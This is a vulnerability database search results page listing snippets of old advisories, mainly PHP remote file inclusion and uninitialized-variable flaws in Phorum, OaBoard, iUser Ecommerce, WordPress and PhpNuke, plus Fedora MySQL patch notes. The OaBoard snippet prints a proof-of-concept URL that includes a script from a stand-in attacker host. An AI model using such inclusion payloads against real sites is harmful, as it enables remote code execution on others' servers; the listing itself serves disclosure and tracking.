Lucene search
K

1110 matches found

CVE
CVE
added 2006/07/14 9:0 p.m.50 views

CVE-2006-3615

Phorum 5.1.14 contains multiple PHP remote file inclusion vulnerabilities when register_globals is enabled. The issue allows remote attackers to execute arbitrary PHP code via vectors related to an uninitialized variable. The affected software is Phorum 5.1.14; impact is partial confidentiality, ...

5.1CVSS8.1AI score0.01974EPSS
Exploits0References8Affected Software1
securityvulns
securityvulns
added 2006/05/31 12:0 a.m.37 views

OaBoard 1.0 Remote File inclusion

OaBoard version 1.x have remote file inclusion . Variables $inc isn't initialized in the include http://host/oaboard/forum.php?inc=http://evilscript/ Hessam-x www.hessamx.net...

2AI score
Exploits0
Prion
Prion
added 2006/02/23 2:6 a.m.20 views

Remote file inclusion

PHP remote file inclusion vulnerability in common.php in Intensive Point iUser Ecommerce allows remote attackers to include arbitrary files via a URL in the includepath variable, which is not initialized before being used...

7.5CVSS7AI score0.02087EPSS
Exploits1References7
Packet Storm
Packet Storm
added 2005/12/28 12:0 a.m.71 views

Tolva.txt

Script: Tolva PHP website system Version: 0.1.0 Language: PHP Official Website: http://sourceforge.net/projects/twebs Problem: Remote File Include Discovered by: beford Description: ============ A complete collection of php scripts that work tightly together to create a highly customizable, dynam...

7.4AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2005/09/12 12:0 a.m.38 views

Fedora Core 3 : mysql-3.23.58-16.FC3.1 (2005-304)

Sat Apr 2 2005 Tom Lane 3.23.58-16.FC3.1 - Repair uninitialized variable in security2 patch. - Enable testing on 64-bit arches; continue to exclude s390x which still has issues. - Sat Mar 19 2005 Tom Lane 3.23.58-15.FC3.1 - Backpatch repair for CVE-2005-0709, CVE-2005-0710, CVE-2005-0711...

4.6CVSS5.4AI score0.1844EPSS
Exploits3References1
OSV
OSV
added 2005/07/05 4:0 a.m.2 views

DEBIAN-CVE-2005-2109

wp-login.php in WordPress 1.5.1.2 and earlier allows remote attackers to change the content of the forgotten password e-mail message via the message variable, which is not initialized before use...

5CVSS7AI score0.02578EPSS
Exploits0References1
securityvulns
securityvulns
added 2005/06/14 12:0 a.m.34 views

File Upload Manager Sploits

Below is some code for a recent unpatched exploit for file managers using php as the base code. Share this with the world and help protect. File Upload Manager - Bypass File Extension and Arbitrary File Delete nothing to see here @ hackthissite.org Through an input validation flaw, users are able...

0.6AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2005/05/19 12:0 a.m.32 views

Fedora Core 2 : mysql-3.23.58-16.FC2.1 (2005-305)

Sat Apr 2 2005 Tom Lane 3.23.58-16.FC2.1 - Repair uninitialized variable in security2 patch. - Enable testing on 64-bit arches; continue to exclude s390x which still has issues. - Fri Mar 18 2005 Tom Lane 3.23.58-15.FC2.1 - Backpatch repair for CVE-2005-0709, CVE-2005-0710, CVE-2005-0711...

4.6CVSS5.4AI score0.1844EPSS
Exploits3References1
Packet Storm
Packet Storm
added 2005/04/17 12:0 a.m.35 views

waraxe-2005-SA041.txt

================================================================================ waraxe-2005-SA041 ================================================================================ Critical Sql Injection in PhpNuke 6.x-7.6 Top module...

7.4AI score
Exploits0
Debian CVE
Debian CVE
added 1976/01/01 12:0 a.m.24 views

CVE-2022-3642

Removed by vendor...

6.8AI score
Exploits0
Rows per page
Query Builder